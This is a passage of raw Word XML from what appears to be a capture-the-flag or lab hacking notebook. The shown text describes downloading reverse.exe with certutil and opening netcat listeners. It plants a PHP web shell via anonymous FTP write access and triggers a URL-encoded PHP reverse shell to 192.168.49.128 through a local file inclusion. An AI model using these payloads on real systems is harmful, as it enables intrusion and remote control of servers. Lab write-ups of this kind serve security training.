      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1397"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This runs certutil.exe on the server, which pulls down your reverse.exe from your Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000143B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000143C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open listener</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000143D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="510"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnp 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000143E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000143F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, visit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001440">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://target/run.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This executes reverse.exe, which then connects back to you.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001442">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open listener first</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000014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44">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001445">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xyzv6k9kfqu8" w:id="170"/>
      <w:bookmarkEnd w:id="170"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/ftp write permissions leading to reverse shell (putting in reverse shell to ftp)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001446">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001447">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId381">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Inclusiveness</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw that we had anonymous login. And so this hinted that maybe we have read permissions for the FTP root directory (usually /var/ftp). To see if we have write permissions, we can use the LFI that we found in the web server previously, and check the FTP config file (specifically the VSFTPD config file).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001448">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001449">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After looking at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/vsftpd.conf </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(the VSFTPD config file), we saw that we the FTP root directory was in /var/ftp and that we had write permissions. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000144A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2070100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="153" name="image170.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image170.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId382"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2070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4B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000144C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means we can upload a PHP reverse shell. But first, let's upload a PHP web shell to test out if this attack vector works. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000144D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000144E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php system($_REQUEST['cmd']) ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000144F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001450">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload the PHP file in the FTP pub directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001451">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp 192.168.128.14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001452">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd pub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001453">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">put php-cmd.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001454">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001455">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try if the PHP payload is working. As shown below that I can execute command using the payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001456">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1371600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="353" name="image348.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image348.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId383"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="137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57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001458">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To gain a remote connection first I will generate a listener.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001459">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -nvlp 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000145A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000145B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: the stuff below will not work since you will have to change the reverse shell to your IP and port before you URL encode it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000145C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000145D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL Encode the one liner PHP reverse shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000145E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">php%20-r%20%27%24sock%3Dfsockopen(%22192.168.49.128%22%2C80)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000145F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001460">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute PHP revershell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001461">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.128.14/secret_information/?lang=../../../../var/ftp/pub/php-cmd.php&amp;cmd=php%20-r%20%27%24sock%3Dfsockopen(%22192.168.49.128%22%2C80)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B%27</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001462">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001463">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="647700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="167" name="image154.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image154.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId384"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="647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464">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the exploit is successfully executed, I will receive a reverse shell connection from port 80 as www-data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001465">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001466">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001467">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000146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69">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000146A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_u5tst6vkrcah" w:id="171"/>
      <w:bookmarkEnd w:id="171"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find files in Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000146B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000146C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Files </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">by Name across the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whole system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000146D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-name "flag.txt" 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000146E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">find / -name local.txt 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000146F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="971"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
